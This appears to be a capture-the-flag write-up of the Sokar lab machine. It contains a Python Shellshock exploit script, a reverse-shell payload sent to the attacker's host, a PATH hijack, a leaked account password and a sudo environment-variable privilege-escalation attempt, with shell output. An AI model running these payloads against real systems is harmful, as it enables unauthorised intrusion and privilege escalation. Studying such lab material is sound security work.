As usual, start with netdiscover to find the target's IP address (10.10.10.145 in this case).
10.10.10.145 is our target!
Then run an nmap scan to find open ports and running services. From the result, Apache 2.2.15 is running on port 591 and the target OS is CentOS Linux.
nmap -sV -v -O -A -T5 -p- 10.10.10.145
Then I opened Iceweasel to take a closer look at port 591.
From the content displayed, the page is running the system commands netstat and iostat on the server and showing their output.
From the page source, I found the URL: http://10.10.10.145:591/cgi-bin/cat
Time to try Shellshock (the bash bug): a CGI script that is written in bash, or that spawns bash, receives the request headers as environment variables, and that is exactly the path Shellshock abuses.
After searching for Shellshock, I found several posts on how to test and exploit the vulnerability through CGI. The following script (sokar.py) is adapted from one of them.
#!/usr/bin/env python3
# sokar.py: Shellshock (CVE-2014-6271) probe against the cat CGI on port 591.
# Reconstructed from the write-up; converted from Python 2's httplib to
# Python 3's http.client, unused urllib import dropped.
import http.client
import sys

str_usage = "Usage: %s <command>" % sys.argv[0]
str_example = "Example: %s \"/bin/cat /etc/passwd\"" % sys.argv[0]

ip = "10.10.10.145"
port = 591
uri = "/cgi-bin/cat"

if len(sys.argv) < 2:
    print(str_usage)
    print(str_example)
    sys.exit(0)

# The header value is an empty bash function definition followed by extra
# commands; a vulnerable bash executes the trailing commands while importing
# the variable. The two echo lines emit a minimal CGI header so Apache returns
# the command output instead of a 500 error.
exp = "() { test;};echo \"Content-type: text/plain\"; echo; echo; " + sys.argv[1]
# the following exp is used to write reverse shell code into the file /home/bynarr/iostat
# exp = "() { test;};echo \"Content-type: text/plain\"; echo; echo; /bin/echo -e '#!/bin/bash\\n/bin/bash -i >& /dev/tcp/10.10.10.131/51242 0>&1' > /home/bynarr/iostat"
print(exp)

# Any header name works: Apache exports it to the CGI as HTTP_<NAME>.
headers = {"test": exp}
conn = http.client.HTTPConnection(ip, port)
conn.request("GET", uri, headers=headers)
res = conn.getresponse()
print(res.status, res.reason)
data = res.read()
print(data.decode(errors="replace"))
conn.close()
Using sokar.py, I poked around the system and found something interesting.
I got the password (fruity) for user bynarr, and noticed that outbound connections from the server are only allowed to port 51242.
Another observation: "." is in $PATH, so when a program is run by its bare name the shell searches the current directory first. That gives us a chance to hijack one of the programs the CGI runs and get a reverse shell back to Kali.
So I changed the exp payload in the Python script to write a bash script into /home/bynarr/iostat (the commented-out payload above); iostat is the hijack target. /home/bynarr is world-writable (see the ls -al below), which is why the apache user could drop the file there.
Then I used the script again to make the fake iostat executable (chmod +x).
Now set up nc on Kali listening on port 51242; after a few seconds I got a shell as bynarr!
root@kali:~# nc -lvnp 51242
listening on [any] 51242 ...
connect to [10.10.10.131] from (UNKNOWN) [10.10.10.145] 56650
bash: no job control in this shell
[bynarr@sokar ~]$ id
id
uid=500(bynarr) gid=501(bynarr) groups=501(bynarr),500(forensic)
[bynarr@sokar ~]$ pwd
pwd
/home/bynarr
[bynarr@sokar ~]$ cat /proc/version
cat /proc/version
Linux version 2.6.32-504.1.3.el6.x86_64 (mockbuild@c6b9.bsys.dev.centos.org) (gcc version 4.4.7 20120313 (Red Hat 4.4.7-11) (GCC) ) #1 SMP Tue Nov 11 17:57:25 UTC 2014
[bynarr@sokar ~]$ ls -al
ls -al
total 48
drwxrwxrwx. 2 bynarr bynarr 4096 Jul 7 17:20 .
drwxr-xr-x. 4 root root 4096 Dec 30 2014 ..
-rw-------. 1 bynarr bynarr 4982 Jul 7 17:13 .bash_history
-rw-r--r--. 1 bynarr bynarr 18 Feb 21 2013 .bash_logout
-rw-r--r--. 1 bynarr bynarr 178 Nov 12 2014 .bash_profile
-rw-r--r--. 1 bynarr bynarr 124 Feb 21 2013 .bashrc
-rwxr-xr-x 1 apache apache 61 Jul 7 16:09 iostat
-rwxr-xr-x 1 root root 368 Jan 27 19:14 lime
-rw------- 1 root root 10728 Nov 13 2014 lime.ko
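As an added illustration of the PATH hijack used above (this is example code, not part of the original write-up): a throw-away directory gets a fake iostat, then "iostat" is run with "." at the front of PATH, as on the target, and with a sane PATH. The fake binary only prints a marker; on the real box it was the reverse-shell script written through the CGI bug. The directory name and the marker text are assumptions.

```shell
# Added demonstration (not from the original write-up) of the PATH hijack.
# Builds a temp directory holding a fake iostat, runs "iostat" with "."
# first in PATH (as on the vulnerable server) and then with a safe PATH.

# Create a directory with a fake iostat and print its path.
make_fake_iostat() {
    dir=$(mktemp -d "$PWD/fakebin.XXXXXX")
    cat > "$dir/iostat" <<'EOF'
#!/bin/sh
# stand-in for the reverse-shell payload: just prove that we ran
echo "HIJACKED: fake iostat executed as $(id -un)"
EOF
    chmod +x "$dir/iostat"      # the step the write-up did via the CGI bug
    printf '%s\n' "$dir"
}

# Run "iostat" from inside $1 with "." first in PATH, the way the server's
# environment was set up; prints the first line of whatever actually ran.
run_with_dot_in_path() {
    ( cd "$1" && PATH=".:/usr/sbin:/usr/bin:/sbin:/bin" && export PATH \
        && iostat 2>/dev/null | head -n 1 )
}

# Same lookup with "." removed: prints the path of the real iostat, or
# "not found" if sysstat is not installed here. Either way it is never ./iostat.
resolve_with_safe_path() {
    ( cd "$1" && PATH="/usr/sbin:/usr/bin:/sbin:/bin" && export PATH \
        && command -v iostat || echo "not found" )
}

d=$(make_fake_iostat)
echo "with '.' in PATH : $(run_with_dot_in_path "$d")"
echo "with safe PATH   : $(resolve_with_safe_path "$d")"
rm -rf "$d"
```

The fix on the defender's side is the second function: drop "." (and any writable directory) from PATH for the account that runs the CGI, and do not let that account write into directories the commands are launched from.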
I ran sudo -l to check which commands user bynarr is allowed to run.
[bynarr@sokar ~]$ sudo -l
sudo -l
Matching Defaults entries for bynarr on this host:
!requiretty, visiblepw, always_set_home, env_reset, env_keep="COLORS
DISPLAY HOSTNAME HISTSIZE INPUTRC KDEDIR LS_COLORS", env_keep+="MAIL PS1
PS2 QTDIR USERNAME LANG LC_ADDRESS LC_CTYPE", env_keep+="LC_COLLATE
LC_IDENTIFICATION LC_MEASUREMENT LC_MESSAGES", env_keep+="LC_MONETARY
LC_NAME LC_NUMERIC LC_PAPER LC_TELEPHONE", env_keep+="LC_TIME LC_ALL
LANGUAGE LINGUAS _XKB_CHARSET XAUTHORITY",
secure_path=/sbin\:/bin\:/usr/sbin\:/usr/bin
User bynarr may run the following commands on this host:
(ALL) NOPASSWD: /home/bynarr/lime
[bynarr@sokar ~]$ sudo LANG='() { :;}; /bin/bash' /home/bynarr/lime
sudo LANG='() { :;}; /bin/bash' /home/bynarr/lime
sudo: sorry, you are not allowed to set the following environment variables: LANG
From the output, lime is owned by root and bynarr may run it via sudo without a password. My first attempt to smuggle a function definition in through LANG was rejected: LANG (like LC_*) is also on sudo's default env_check list, and env_check drops any value containing "/" or "%".
Since the server is vulnerable to Shellshock, I used the following one-liner (taken from one of the Shellshock write-ups) to double check whether it can also be exploited locally.
env x='() { :;}; echo vulnerable' bash -c "echo this is a test"
[bynarr@sokar ~]$ env x='() { :;}; echo vulnerable' bash -c "echo this is a test"
< { :;}; echo vulnerable' bash -c "echo this is a test"
vulnerable
this is a test
Yes, it is vulnerable! From the earlier sudo -l output, several environment variables survive env_reset via env_keep, so one of them may be able to carry a function definition into the root-run lime script.
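To see which variables those are without reading the wrapped sudo -l output by eye, here is an added helper (example code, not from the original write-up) that extracts every name listed in an env_keep or env_keep+= clause. The sample input is a constructed copy of the session output above; the function name is an assumption.

```shell
# Added example (not from the original write-up): pull the env_keep list out
# of "sudo -l" output. Reads the output on stdin, prints one variable per line.
extract_env_keep() {
    # join the wrapped lines, pick each env_keep="..." / env_keep+="..."
    # clause, strip the quotes, split on whitespace, de-duplicate
    tr '\n' ' ' \
      | grep -o 'env_keep+\{0,1\}="[^"]*"' \
      | sed 's/^[^"]*"//; s/"$//' \
      | tr -s ' ' '\n' \
      | grep -v '^$' \
      | sort -u
}

# Constructed copy of the sudo -l output shown in the session above.
SUDO_L_SAMPLE='Matching Defaults entries for bynarr on this host:
    !requiretty, visiblepw, always_set_home, env_reset, env_keep="COLORS
    DISPLAY HOSTNAME HISTSIZE INPUTRC KDEDIR LS_COLORS", env_keep+="MAIL PS1
    PS2 QTDIR USERNAME LANG LC_ADDRESS LC_CTYPE", env_keep+="LC_COLLATE
    LC_IDENTIFICATION LC_MEASUREMENT LC_MESSAGES", env_keep+="LC_MONETARY
    LC_NAME LC_NUMERIC LC_PAPER LC_TELEPHONE", env_keep+="LC_TIME LC_ALL
    LANGUAGE LINGUAS _XKB_CHARSET XAUTHORITY",
    secure_path=/sbin\:/bin\:/usr/sbin\:/usr/bin
User bynarr may run the following commands on this host:
    (ALL) NOPASSWD: /home/bynarr/lime'

# Usage on a live box would be: sudo -l | extract_env_keep
printf '%s\n' "$SUDO_L_SAMPLE" | extract_env_keep
```

Cross the resulting list against the variables sudo additionally filters (the env_check names, LANG and LC_* among them, lose values containing "/" or "%"): what is left, PS1 and PS2 for example, is what can reach the root-run bash script unmodified.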